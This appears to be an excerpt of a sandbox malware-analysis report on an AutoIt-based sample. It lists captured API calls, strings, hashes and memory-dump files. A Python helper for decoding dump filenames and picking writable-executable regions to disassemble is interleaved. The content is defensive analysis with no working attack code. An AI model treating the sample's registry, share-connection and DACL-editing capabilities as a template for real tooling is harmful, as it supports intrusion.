                                                          • Part of subcall function 0074B8E7: RtlAllocateHeap.NTDLL(00000000,?,0074B3CB), ref: 0074B923
                                                          • Part of subcall function 0074B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0074B93A
                                                          • Part of subcall function 0074B982: GetProcessHeap.KERNEL32(00000008,0074B3E1,00000000,00000000,?,0074B3E1,?), ref: 0074B98E
                                                          • Part of subcall function 0074B982: RtlAllocateHeap.NTDLL(00000000,?,0074B3E1), ref: 0074B995
                                                          • Part of subcall function 0074B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0074B3E1,?), ref: 0074B9A6
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0074B5F7
                                                        • _memset.LIBCMT ref: 0074B60C
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0074B62B
                                                        • GetLengthSid.ADVAPI32(?), ref: 0074B63C
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0074B679
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0074B695
                                                        • GetLengthSid.ADVAPI32(?), ref: 0074B6B2
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0074B6C1
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0074B6C8
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0074B6E9
                                                        • CopySid.ADVAPI32(00000000), ref: 0074B6F0
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0074B721
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0074B747
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0074B75B
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 2347767575-0
                                                        • Opcode ID: fb1e012c0f16c91fbbb6e35ffa0dd6fd91c2c99b5e1c2ddaf57cfb0e88ea4a3b
                                                        • Instruction ID: e2113547693b1fb43bc2a85284970b201d44a41842dba1274b3bedcbdb1d4c5c
                                                        • Opcode Fuzzy Hash: fb1e012c0f16c91fbbb6e35ffa0dd6fd91c2c99b5e1c2ddaf57cfb0e88ea4a3b
                                                        • Instruction Fuzzy Hash: 39515A71900209EBDF119FA5DC85EEEBB79FF48314F04816AE915A7290DB39DE05CB60
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0076A2DD
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0076A2E9
                                                        • CreateCompatibleDC.GDI32(?), ref: 0076A2F5
                                                        • SelectObject.GDI32(00000000,?), ref: 0076A302
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0076A356
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0076A392
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0076A3B6
                                                        • SelectObject.GDI32(00000006,?), ref: 0076A3BE
                                                        • DeleteObject.GDI32(?), ref: 0076A3C7
                                                        • DeleteDC.GDI32(00000006), ref: 0076A3CE
                                                        • ReleaseDC.USER32(00000000,?), ref: 0076A3D9
                                                        Strings
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 27ccd9006c1a1195589d72f38d84b1212d973b35921530d212abc132152dd1b7
                                                        • Instruction ID: 342c9da3fb63eac1f3236c3f8f700a230a726d2f09080b2327e1e04644f6747f
                                                        • Opcode Fuzzy Hash: 27ccd9006c1a1195589d72f38d84b1212d973b35921530d212abc132152dd1b7
                                                        • Instruction Fuzzy Hash: BD513B76940309EFDB25CFA9C885EAEBBB9EF48310F14841EF956A7210C735AC418B54
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        Strings
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E|
                                                        • API String ID: 3964851224-2413633094
                                                        • Opcode ID: 3217daa7603802baedad45c4ee4e9d0267940028db62ebf8260d4940804a2eba
                                                        • Instruction ID: d6699f4e1fa64b1fef66a84584c43dd12aaacf38951e0ca5064a6399022ef6c3
                                                        • Opcode Fuzzy Hash: 3217daa7603802baedad45c4ee4e9d0267940028db62ebf8260d4940804a2eba
                                                        • Instruction Fuzzy Hash: 1D41A03410024ACBDF05EF14E855BEA3372AF15380F14883DECA56B295DB3C9E1ADB61
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00783C64,00000010,00000000,Bad directive syntax error,007ADBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 007532D1
                                                        • LoadStringW.USER32(00000000,?,00783C64,00000010), ref: 007532D8
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • _wprintf.LIBCMT ref: 00753309
                                                        • __swprintf.LIBCMT ref: 0075332B
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00753395
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"}
                                                        • API String ID: 1506413516-3181106796
                                                        • Opcode ID: 5d242b86937e30bfa84afa09836d3ff91dc6ce095a7985c2ec496a0e742b03b2
                                                        • Instruction ID: e274f7b337d592753457b61de06bbe8d30bbf259d44e7b59e0b6559654f7a9d0
                                                        • Opcode Fuzzy Hash: 5d242b86937e30bfa84afa09836d3ff91dc6ce095a7985c2ec496a0e742b03b2
                                                        • Instruction Fuzzy Hash: 5E21717184421DFBDF11AFD0CC0AEEE7735BF14701F00845AB515710A2DABDAA58DBA0
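Every entry in this section points at the same set of memory dumps under "Memory Dump Source", and the error-format strings in the entries above (`>>>AUTOIT SCRIPT<<<`, `Line %d (File "%s"):`) identify the 0x710000 module as the AutoIt3 interpreter the sample is built on, so the practical question is which dump to open in a disassembler. The following Python helper is an added example, not part of the Joe Sandbox report or its tooling: it decodes the `.sdmp` names listed above and ranks the image-backed regions that were both writable and executable at dump time. The eight-field layout it assumes (`proc.stage.dumpid.base.protect.field5.type.field7.sdmp`) is inferred from the names on this page rather than documented; only the base address, the protection value (which matches the Windows `PAGE_*` constants) and the type value (which matches `MEM_IMAGE`) are interpreted, and the two unidentified fields are kept as raw integers. The sample block is constructed from the lines above, including the "Download File" link label the rendered page glues onto each name.

```python
"""Decode Joe Sandbox ".sdmp" memory-dump names as listed under "Memory Dump
Source", so the right dump can be picked for disassembly.

ASSUMED field layout (inferred from the names on the page, not documented):
    <proc>.<stage>.<dumpid>.<base>.<protect>.<field5>.<type>.<field7>.sdmp
Only <base>, <protect> and <type> are interpreted, via the Windows PAGE_* and
MEM_* constants their values match; the other fields are kept as raw ints.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Windows page-protection constants (low byte of the protect value).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = ((0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"), (0x400, "PAGE_WRITECOMBINE"))
# Windows memory-type constants as reported by VirtualQuery.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_PROTECTS = {0x10, 0x20, 0x40, 0x80}
WRITE_PROTECTS = {0x04, 0x08, 0x40, 0x80}


@dataclass(frozen=True)
class SdmpName:
    process: int    # process index in the analysis (assumed meaning)
    stage: int      # analysis stage (assumed meaning)
    dump_id: int    # per-dump counter, kept opaque
    base: int       # region base address
    protect: int    # PAGE_* value
    field5: int     # unidentified, kept raw
    mem_type: int   # MEM_* value
    field7: int     # unidentified, kept raw

    @property
    def protect_name(self) -> str:
        name = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")
        mods = [m for bit, m in PAGE_MODIFIERS if self.protect & bit]
        return "|".join([name, *mods])

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return (self.protect & 0xFF) in EXEC_PROTECTS

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in WRITE_PROTECTS


def parse_sdmp_name(name: str) -> SdmpName:
    """Split one .sdmp filename into its fields; raise ValueError otherwise."""
    stem, _, ext = name.rpartition(".")
    parts = stem.split(".")
    if ext != "sdmp" or len(parts) != 8:
        raise ValueError(f"not an 8-field .sdmp name: {name!r}")
    proc, stage, dump_id, base, prot, f5, mtype, f7 = parts
    return SdmpName(int(proc, 16), int(stage, 16), int(dump_id, 10), int(base, 16),
                    int(prot, 16), int(f5, 16), int(mtype, 16), int(f7, 16))


# Both line shapes used by the report; the rendered page appends "Download File".
#   • Source File: <name>, Offset: 00710000, based on PE: true
#   • Associated: <name>Download File
_LINE_RE = re.compile(
    r"(?:Source File|Associated):\s*(?P<name>\S+?\.sdmp)(?:Download File)?"
    r"(?:,\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+))?"
)


def parse_dump_source_block(text: str) -> tuple[list[SdmpName], int | None]:
    """Parse a 'Memory Dump Source' block into (dumps, module offset or None)."""
    dumps, offset = [], None
    for line in text.splitlines():
        m = _LINE_RE.search(line)
        if not m:
            continue
        dumps.append(parse_sdmp_name(m.group("name")))
        if m.group("offset") is not None:
            offset = int(m.group("offset"), 16)
    return dumps, offset


def writable_code_regions(dumps: list[SdmpName]) -> list[int]:
    """Bases of image-backed regions that were writable AND executable.

    A normal PE section is one or the other, so these are the dumps to open
    first when looking for code that was unpacked or patched in place.
    """
    return sorted(d.base for d in dumps
                  if d.mem_type == 0x1000000 and d.executable and d.writable)


# Constructed from the "Memory Dump Source" block of the entries on this page.
SAMPLE_BLOCK = """\
• Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
• Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
"""

if __name__ == "__main__":
    dumps, module_base = parse_dump_source_block(SAMPLE_BLOCK)
    for d in dumps:
        rva = d.base - module_base if module_base is not None else 0
        print(f"{d.base:#010x} (+{rva:#07x}) {d.protect_name:24} {d.type_name}")
    print("writable+executable image regions:",
          [hex(b) for b in writable_code_regions(dumps)])
```

Run against the block above, the only non-executable image regions are the PE header at 0x710000 (`PAGE_READONLY`) and the data region at 0x84C000 (`PAGE_READWRITE`); the 0x711000 region that every entry cites as its Source File is `PAGE_EXECUTE_READWRITE`, which is why it is the dump the IDA plugin results were taken from. The `Offset` field gives the module base, so `base - offset` is the RVA to use when matching a dump against the on-disk PE's section table.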
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 0075D567
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 0075D589
                                                        • __swprintf.LIBCMT ref: 0075D5DC
                                                        • _wprintf.LIBCMT ref: 0075D68D
                                                        • _wprintf.LIBCMT ref: 0075D6AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2116804098-2391861430
                                                        • Opcode ID: 43f97de8b1dad62bc05f6c8a1a71868b3fb9763c5f5738f973ac407692fdb546
                                                        • Instruction ID: 3a0a215f2ad1f84cbeb3cd7541c6beceed324b32bcd251e6d2b54b80fab0e347
                                                        • Opcode Fuzzy Hash: 43f97de8b1dad62bc05f6c8a1a71868b3fb9763c5f5738f973ac407692fdb546
                                                        • Instruction Fuzzy Hash: 53519471900109FACB25FBA4CD46EEEB779EF04301F108166F505B20A1EB796F98DBA1
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0075D37F
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0075D3A0
                                                        • __swprintf.LIBCMT ref: 0075D3F3
                                                        • _wprintf.LIBCMT ref: 0075D499
                                                        • _wprintf.LIBCMT ref: 0075D4B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2116804098-3420473620
                                                        • Opcode ID: 79b7ec1df03d8f7f877fe118ded00f3471de73c521a4d3a78764e69c6fb17ef1
                                                        • Instruction ID: 3438010a64ee55d0ac468245d4e5c9d634fda42caf8e27e013d968c43d5c1657
                                                        • Opcode Fuzzy Hash: 79b7ec1df03d8f7f877fe118ded00f3471de73c521a4d3a78764e69c6fb17ef1
                                                        • Instruction Fuzzy Hash: 8551A571900109FACB25FBE4CD4AEEEB779AF14701F108166B505720A1EB7D6F98CBA1
                                                        APIs
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • _memset.LIBCMT ref: 0074AF74
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0074AFA9
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0074AFC5
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0074AFE1
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0074B00B
                                                        • CLSIDFromString.COMBASE(?,?), ref: 0074B033
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0074B03E
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0074B043
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1411258926-22481851
                                                        • Opcode ID: b84fb4a3b2c53a77adb2b3c5eb1482ac50b142f793fb9c5ce14e34c227781952
                                                        • Instruction ID: 22e3a3be37991d1a0f25c3f22b7384e654200a80d6b2c71c8ef6729df58202a5
                                                        • Opcode Fuzzy Hash: b84fb4a3b2c53a77adb2b3c5eb1482ac50b142f793fb9c5ce14e34c227781952
                                                        • Instruction Fuzzy Hash: 47411976C10229EBCF11EFA8DC95DEEB7B8BF04700F404129E911B21A1EB789E45CB90
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00757226
                                                        • __swprintf.LIBCMT ref: 00757233
                                                          • Part of subcall function 0073234B: __woutput_l.LIBCMT ref: 007323A4
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 0075725D
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00757269
                                                        • LockResource.KERNEL32(00000000), ref: 00757276
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00757296
                                                        • LoadResource.KERNEL32(?,00000000), ref: 007572A8
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 007572B7
                                                        • LockResource.KERNEL32(?), ref: 007572C3
                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00757322
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                        • String ID: L6|
                                                        • API String ID: 1433390588-1450050004
                                                        • Opcode ID: 1ea0c8ef30300c1a99f5a0f702410d8caf9fe1cf980655625bd0aa6da935fc8b
                                                        • Instruction ID: d3de6c23fc4dfe8c2a9a34965f13dc5be229fc5bcaf032512ad84c49199e989e
                                                        • Opcode Fuzzy Hash: 1ea0c8ef30300c1a99f5a0f702410d8caf9fe1cf980655625bd0aa6da935fc8b
                                                        • Instruction Fuzzy Hash: CA31BEB190425AABDB159F60EC89AEF7BB9FF08302F008426FD01D2151E77CD955DAA4
                                                        APIs
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0075843F
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00758455
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00758466
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00758478
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00758489
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: 6197c5f907615d7f681011792b8a49903e4d36d9d9a37dedfe8a9dcd835b8fea
                                                        • Instruction ID: e6bef35686193daa2e2fa08d4f0c2275d4ad02fff1ca3f68405b90fa28ba9dcf
                                                        • Opcode Fuzzy Hash: 6197c5f907615d7f681011792b8a49903e4d36d9d9a37dedfe8a9dcd835b8fea
                                                        • Instruction Fuzzy Hash: A011C8A1640159B9D710BBA5CC4AEFF7B7CEB91B00F40442D7811B20C0DEA85E49C9B1
                                                        APIs
                                                        • timeGetTime.WINMM ref: 0075809C
                                                          • Part of subcall function 0072E3A5: timeGetTime.WINMM(?,75C0B400,00786163), ref: 0072E3A9
                                                        • Sleep.KERNEL32(0000000A), ref: 007580C8
                                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 007580EC
                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0075810E
                                                        • SetActiveWindow.USER32 ref: 0075812D
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0075813B
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0075815A
                                                        • Sleep.KERNEL32(000000FA), ref: 00758165
                                                        • IsWindow.USER32 ref: 00758171
                                                        • EndDialog.USER32(00000000), ref: 00758182
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: d3cff1a27dee026300921a542503bcf39badbbcc50f9377c93375b9ba03d7923
                                                        • Instruction ID: 85ced2d7928b2dec3d66a0b5186670957ea2b4b8057d3ddd0884fd59097432b0
                                                        • Opcode Fuzzy Hash: d3cff1a27dee026300921a542503bcf39badbbcc50f9377c93375b9ba03d7923
                                                        • Instruction Fuzzy Hash: B221AA70201645BFE7615B61EC49B763B3AF70438AF04821AF905A3261CFBE4D0A8B1B
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 44c6d5f39d77699ee8016bf8f7899b7975bfa3dc072c1b4bd6184e2c1e9cb836
                                                        • Instruction ID: 0b241d5d7a7855c710de139b386b054d1712a0a31240783f2362ff8f52e60ce2
                                                        • Opcode Fuzzy Hash: 44c6d5f39d77699ee8016bf8f7899b7975bfa3dc072c1b4bd6184e2c1e9cb836
                                                        • Instruction Fuzzy Hash: 7E110571908115ABDB34A770AC4AEDE337CEB05721F004066F84992091EFBCEE85C6A4
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
